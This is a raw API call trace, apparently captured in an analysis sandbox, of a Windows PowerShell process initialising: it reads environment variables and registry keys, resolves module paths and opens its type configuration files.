	[0544.374] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0544.377] CoCreateGuid (in: pguid=0xadaf0 | out: pguid=0xadaf0*(Data1=0x34c60bf0, Data2=0x58e7, Data3=0x4cd6, Data4=([0]=0x9f, [1]=0x7b, [2]=0x7e, [3]=0x4e, [4]=0x19, [5]=0x4c, [6]=0xe4, [7]=0x46))) returned 0x0
	[0544.378] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0544.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.378] CoTaskMemFree (pv=0x20dda0) 
	[0545.417] WinSqmIsOptedIn () returned 0x0
	[0545.418] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0545.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.419] CoTaskMemFree (pv=0x20dda0) 
	[0545.424] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0545.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.424] CoTaskMemFree (pv=0x20dda0) 
	[0545.425] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0545.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.425] CoTaskMemFree (pv=0x20dda0) 
	[0545.427] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0545.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.427] CoTaskMemFree (pv=0x20dda0) 
	[0545.428] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0545.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.428] CoTaskMemFree (pv=0x20dda0) 
	[0545.429] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0545.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.429] CoTaskMemFree (pv=0x20dda0) 
	[0545.430] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0545.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.430] CoTaskMemFree (pv=0x20dda0) 
	[0545.430] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0545.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.430] CoTaskMemFree (pv=0x20dda0) 
	[0545.433] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0545.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.433] CoTaskMemFree (pv=0x20dda0) 
	[0545.441] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0545.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.441] CoTaskMemFree (pv=0x20dda0) 
	[0546.413] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0546.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.413] CoTaskMemFree (pv=0x20dda0) 
	[0546.414] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0546.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.414] CoTaskMemFree (pv=0x20dda0) 
	[0549.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0549.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0549.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0549.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.020] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0553.020] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0553.020] CoTaskMemFree (pv=0x20dda0) 
	[0553.022] CoTaskMemAlloc (cb=0xcc) returned 0x1b75b090
	[0553.022] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b75b090, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0553.022] CoTaskMemFree (pv=0x1b75b090) 
	[0553.022] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xad668 | out: phkResult=0xad668*=0x31c) returned 0x0
	[0553.022] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xad5ec, lpData=0x0, lpcbData=0xad5e8*=0x0 | out: lpType=0xad5ec*=0x2, lpData=0x0, lpcbData=0xad5e8*=0x6c) returned 0x0
	[0553.022] CoTaskMemAlloc (cb=0x70) returned 0x1a13e0
	[0553.022] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xad5bc, lpData=0x1a13e0, lpcbData=0xad5b8*=0x6c | out: lpType=0xad5bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xad5b8*=0x6c) returned 0x0
	[0553.022] CoTaskMemFree (pv=0x1a13e0) 
	[0553.022] CoTaskMemAlloc (cb=0xcc) returned 0x1b75b090
	[0553.022] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b75b090, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0553.022] CoTaskMemFree (pv=0x1b75b090) 
	[0553.022] CoTaskMemAlloc (cb=0xcc) returned 0x1b75b090
	[0553.022] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b75b090, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0553.023] CoTaskMemFree (pv=0x1b75b090) 
	[0555.148] RegCloseKey (hKey=0x31c) returned 0x0
	[0555.148] CoTaskMemAlloc (cb=0xcc) returned 0x1b75b090
	[0555.148] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b75b090, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0555.148] CoTaskMemFree (pv=0x1b75b090) 
	[0555.148] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xad668 | out: phkResult=0xad668*=0x31c) returned 0x0
	[0555.148] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xad5ec, lpData=0x0, lpcbData=0xad5e8*=0x0 | out: lpType=0xad5ec*=0x0, lpData=0x0, lpcbData=0xad5e8*=0x0) returned 0x2
	[0555.149] RegCloseKey (hKey=0x31c) returned 0x0
	[0555.154] CoTaskMemAlloc (cb=0x20c) returned 0x1ff2e0
	[0555.155] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ff2e0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0555.156] CoTaskMemFree (pv=0x1ff2e0) 
	[0555.156] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xad1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0555.157] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0555.168] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0555.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.168] CoTaskMemFree (pv=0x20dda0) 
	[0555.170] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0555.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.171] CoTaskMemFree (pv=0x20dda0) 
	[0555.174] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0555.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.174] CoTaskMemFree (pv=0x20dda0) 
	[0555.174] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0555.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.175] CoTaskMemFree (pv=0x20dda0) 
	[0555.176] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x324) returned 0x0
	[0555.177] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0xad46c, lpData=0x0, lpcbData=0xad468*=0x0 | out: lpType=0xad46c*=0x1, lpData=0x0, lpcbData=0xad468*=0x74) returned 0x0
	[0555.178] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0xad3dc, lpData=0x0, lpcbData=0xad3d8*=0x0 | out: lpType=0xad3dc*=0x1, lpData=0x0, lpcbData=0xad3d8*=0x74) returned 0x0
	[0555.178] CoTaskMemAlloc (cb=0x78) returned 0x1a13e0
	[0555.178] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0xad3ac, lpData=0x1a13e0, lpcbData=0xad3a8*=0x74 | out: lpType=0xad3ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xad3a8*=0x74) returned 0x0
	[0555.178] CoTaskMemFree (pv=0x1a13e0) 
	[0555.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xad120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0555.178] SetErrorMode (uMode=0x1) returned 0x1
	[0555.178] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xad330 | out: lpFileInformation=0xad330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0555.178] SetErrorMode (uMode=0x1) returned 0x1
	[0555.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xad120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0555.181] SetErrorMode (uMode=0x1) returned 0x1
	[0555.181] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad330 | out: lpFileInformation=0xad330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0555.181] SetErrorMode (uMode=0x1) returned 0x1
	[0555.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xad120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0555.185] SetErrorMode (uMode=0x1) returned 0x1
	[0555.185] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad330 | out: lpFileInformation=0xad330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0555.185] SetErrorMode (uMode=0x1) returned 0x1
	[0555.189] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0555.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.189] CoTaskMemFree (pv=0x20dda0) 
	[0557.149] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0557.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0557.149] CoTaskMemFree (pv=0x20dda0) 
	[0557.150] GetACP () returned 0x4e4
	[0557.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xacce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0557.169] SetErrorMode (uMode=0x1) returned 0x1
	[0557.170] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0557.171] GetFileType (hFile=0x328) returned 0x1
	[0557.171] SetErrorMode (uMode=0x1) returned 0x1
	[0557.171] GetFileType (hFile=0x328) returned 0x1
	[0557.174] ReadFile (in: hFile=0x328, lpBuffer=0x2dd10e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2dd10e8*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0557.176] ReadFile (in: hFile=0x328, lpBuffer=0x2dd10e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2dd10e8*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0557.176] ReadFile (in: hFile=0x328, lpBuffer=0x2dd10e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2dd10e8*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0559.108] ReadFile (in: hFile=0x328, lpBuffer=0x2dd10e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2dd10e8*, lpNumberOfBytesRead=0xad268*=0xcf3, lpOverlapped=0x0) returned 1
	[0559.109] ReadFile (in: hFile=0x328, lpBuffer=0x2dd0543, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2dd0543*, lpNumberOfBytesRead=0xad268*=0x0, lpOverlapped=0x0) returned 1
	[0559.109] ReadFile (in: hFile=0x328, lpBuffer=0x2dd10e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2dd10e8*, lpNumberOfBytesRead=0xad268*=0x0, lpOverlapped=0x0) returned 1
	[0559.110] CloseHandle (hObject=0x328) returned 1
	[0559.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xacf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0559.115] SetErrorMode (uMode=0x1) returned 0x1
	[0559.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad1e0 | out: lpFileInformation=0xad1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0559.115] SetErrorMode (uMode=0x1) returned 0x1
	[0559.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0559.117] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad2c8 | out: phkResult=0xad2c8*=0x328) returned 0x0
	[0559.117] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad24c, lpData=0x0, lpcbData=0xad248*=0x0 | out: lpType=0xad24c*=0x1, lpData=0x0, lpcbData=0xad248*=0x56) returned 0x0
	[0559.117] CoTaskMemAlloc (cb=0x5a) returned 0x1b7652a0
	[0559.117] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad21c, lpData=0x1b7652a0, lpcbData=0xad218*=0x56 | out: lpType=0xad21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad218*=0x56) returned 0x0
	[0559.117] CoTaskMemFree (pv=0x1b7652a0) 
	[0559.117] RegCloseKey (hKey=0x328) returned 0x0
	[0559.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0559.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xacdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0562.374] GetSystemInfo (in: lpSystemInfo=0xabf00 | out: lpSystemInfo=0xabf00*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0562.375] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0562.398] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0562.398] GetFileType (hFile=0x324) returned 0x1
	[0562.398] SetErrorMode (uMode=0x1) returned 0x1
	[0562.398] GetFileType (hFile=0x324) returned 0x1
	[0562.398] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
